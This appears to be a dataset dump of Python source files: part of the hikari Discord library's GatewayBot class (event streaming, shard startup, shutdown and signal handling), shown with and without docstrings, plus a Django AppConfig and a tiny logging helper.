If you use `stream.open()` to start the stream then you must
also close it with `stream.close()` otherwise it may queue
events in memory indefinitely.
Examples
--------
```py
with bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id)) as stream:
async for user_id in stream.map("user_id").limit(50):
...
```
or using `open()` and `close()`
```py
stream = bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id))
stream.open()
        async for user_id in stream.map("user_id").limit(50):
...
stream.close()
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Subscribe a given callback to a given event type.
Parameters
----------
event_type : typing.Type[T]
The event type to listen for. This will also listen for any
subclasses of the given type.
`T` must be a subclass of `hikari.events.base_events.Event`.
callback
Must be a coroutine function to invoke. This should
consume an instance of the given event, or an instance of a valid
subclass if one exists. Any result is discarded.
Example
-------
The following demonstrates subscribing a callback to message creation
events.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.subscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Unsubscribe a given callback from a given event type, if present.
Parameters
----------
event_type : typing.Type[T]
The event type to unsubscribe from. This must be the same exact
type as was originally subscribed with to be removed correctly.
`T` must derive from `hikari.events.base_events.Event`.
callback
The callback to unsubscribe.
Example
-------
The following demonstrates unsubscribing a callback from a message
creation event.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.unsubscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
"""Wait for a given event to occur once, then return the event.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
predicate
A function taking the event as the single parameter.
This should return `builtins.True` if the event is one you want to
return, or `builtins.False` if the event should not be returned.
If left as `None` (the default), then the first matching event type
that the bot receives (or any subtype) will be the one returned.
!!! warning
Async predicates are not supported.
timeout : typing.Union[builtins.float, builtins.int, builtins.None]
The amount of time to wait before raising an `asyncio.TimeoutError`
and giving up instead. This is measured in seconds. If
`builtins.None`, then no timeout will be waited for (no timeout can
result in "leaking" of coroutines that never complete if called in
an uncontrolled way, so is not recommended).
Returns
-------
hikari.events.base_events.Event
The event that was provided.
Raises
------
asyncio.TimeoutError
If the timeout is not `builtins.None` and is reached before an
event is received that the predicate returns `builtins.True` for.
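        Example
        -------
        A minimal usage sketch (the "!ping" content check is illustrative):
        ```py
        from hikari.events.messages import MessageCreateEvent
        event = await bot.wait_for(
            MessageCreateEvent,
            timeout=60,
            predicate=lambda e: e.content == "!ping",
        )
        ```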
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
"""
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
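        # Discord routes a guild to shard (guild_id >> 22) % shard_count;
        # calculate_shard_id implements that mapping.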
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
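        # Fan the presence update out to every started shard and wait for all
        # of them to complete.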
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
# without getting undefined behaviour. We do however have `asyncio.run_coroutine_threadsafe` which can
# run a coroutine function on the event loop from a completely different thread, so this is the safest
# solution.
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
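        # Track the shard before start-up completes so that a concurrent
        # close() (which iterates self._shards) can still shut it down.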
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
| 42.539237
| 120
| 0.639413
|
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
    # This seems to cause confusion for a lot of people, so let's add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
        # Throwing this in the handler will lead to lots of fun OS-specific shenanigans. So, let's just
# cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
            # We can't always safely intercept this either, as Windows does not allow us to install asyncio
            # loop signal handlers (these only exist for a remote few standard C signal types, and only on
            # POSIX-like platforms). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
| true
| true
|
f707ae782f2ab37d3669980273f149ae70d29ab3
| 880
|
py
|
Python
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | 1
|
2019-12-23T07:23:35.000Z
|
2019-12-23T07:23:35.000Z
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | 5
|
2020-02-12T02:55:56.000Z
|
2021-06-10T22:57:10.000Z
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
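A minimal sketch of how such an AppConfig is typically activated in a Django settings module (the neighbouring entries are illustrative):

# settings.py (illustrative)
INSTALLED_APPS = [
    "django.contrib.contenttypes",
    "django.contrib.auth",
    # Either the bare app label or the dotted AppConfig path works:
    "pipeline_plugins.apps.PipelinePluginsConfig",
]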
| 41.904762
| 115
| 0.792045
|
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
| true
| true
|
f707b2d689b6899a968f7f569001203c9440ef3b
| 73
|
py
|
Python
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | 2
|
2015-08-11T00:47:49.000Z
|
2016-03-05T13:09:12.000Z
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | 23
|
2015-08-10T11:11:05.000Z
|
2015-09-22T16:18:04.000Z
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | null | null | null |
logging = False
def log(string):
if logging:
print(string)
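A minimal usage sketch, assuming the module is importable as log:

import log

log.logging = True            # enable output for every log() call
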